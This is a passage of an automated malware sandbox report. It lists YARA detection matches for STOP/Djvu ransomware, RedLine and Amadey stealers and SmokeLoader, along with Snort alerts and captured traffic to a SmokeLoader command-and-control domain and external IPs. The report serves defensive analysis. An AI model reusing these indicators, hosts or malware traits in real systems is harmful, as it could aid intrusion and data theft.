10.2.5274.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.5274.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.5274.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
37.0.oneetx.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.2.325D.exe.4171e76.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4171e76.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x264fe:$pat14: , CommandLine: 0x1e509:$v2_1: ListOfProcesses 0x1ca03:$v4_3: base64str 0x1c9c2:$v4_4: stringKey 0x1ca0d:$v4_5: BytesToStringConverted 0x1c9f8:$v4_6: FromBase64 0x1e2bf:$v4_8: procName
30.2.5274.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
30.2.5274.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
30.2.5274.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.5274.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.5274.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.5274.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
30.2.5274.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
30.2.5274.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
30.2.5274.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.oldplayer.exe.960000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.0.oneetx.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.3.325D.exe.3eb0000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.3.325D.exe.3eb0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.2.325D.exe.4320000.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4320000.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x264fe:$pat14: , CommandLine: 0x1e509:$v2_1: ListOfProcesses 0x1ca03:$v4_3: base64str 0x1c9c2:$v4_4: stringKey 0x1ca0d:$v4_5: BytesToStringConverted 0x1c9f8:$v4_6: FromBase64 0x1e2bf:$v4_8: procName
21.2.96DF.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.E640.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.E640.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.E640.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.E640.exe.41015a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.E640.exe.41015a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.E640.exe.41015a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.oneetx.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.5274.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.5274.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.5274.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.325D.exe.4320000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4320000.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x246fe:$pat14: , CommandLine: 0x1c709:$v2_1: ListOfProcesses 0x1ac03:$v4_3: base64str 0x1abc2:$v4_4: stringKey 0x1ac0d:$v4_5: BytesToStringConverted 0x1abf8:$v4_6: FromBase64 0x1c4bf:$v4_8: procName
27.0.oldplayer.exe.960000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.0.FE5F.exe.980000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x424e9b:$s1: Runner 0x425000:$s3: RunOnStartup 0x424eaf:$a1: Antis 0x424edc:$a2: antiVM 0x424ee3:$a3: antiSandbox 0x424eef:$a4: antiDebug 0x424ef9:$a5: antiEmulator 0x424f06:$a6: enablePersistence 0x424f18:$a7: enableFakeError 0x425029:$a8: DetectVirtualMachine 0x42504e:$a9: DetectSandboxie 0x425079:$a10: DetectDebugger 0x425088:$a11: CheckEmulator
7.2.617B.exe.41415a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.617B.exe.41415a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.617B.exe.41415a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.5274.exe.40515a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.5274.exe.40515a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.5274.exe.40515a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.C474.exe.41215a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.C474.exe.41215a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.C474.exe.41215a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.5274.exe.40515a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.5274.exe.40515a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.5274.exe.40515a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.5274.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.5274.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.5274.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
18.2.C474.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
18.2.C474.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
18.2.C474.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
23.2.FE5F.exe.420fd90.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.FE5F.exe.41a1d50.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 126 entries

Snort Signatures

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.851600532045695 07/27/23-20:18:39.261916
SID:	2045695
Source Port:	51600
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.860080532045695 07/27/23-20:18:45.048520
SID:	2045695
Source Port:	60080
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.864167532045695 07/27/23-20:18:54.999452
SID:	2045695
Source Port:	64167
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.858565532045695 07/27/23-20:18:57.477023
SID:	2045695
Source Port:	58565
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.856807532045695 07/27/23-20:18:59.101253
SID:	2045695
Source Port:	56807
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tivdql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: potunulit.org

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.6.54.58:443 -> 192.168.2.4:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49896 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 21.3.96DF.exe.3e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.3e10e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.662382966.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

6_2_004822E0

Source: file.exe, 00000000.00000002.572135281.00000000024B8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 13.2.C474.exe.41215a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.5274.exe.41b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5274.exe.41815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.5274.exe.41b15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.5274.exe.40f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.617B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.5274.exe.40f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.617B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.5274.exe.41a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5274.exe.41815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.E640.exe.41015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.E640.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.617B.exe.41415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.5274.exe.41a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.C474.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.5274.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.5274.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.E640.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.E640.exe.41015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.5274.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.617B.exe.41415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.5274.exe.40515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.C474.exe.41215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.5274.exe.40515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.5274.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.C474.exe.400000.0.raw.unpack, type: UNPACKEDPE
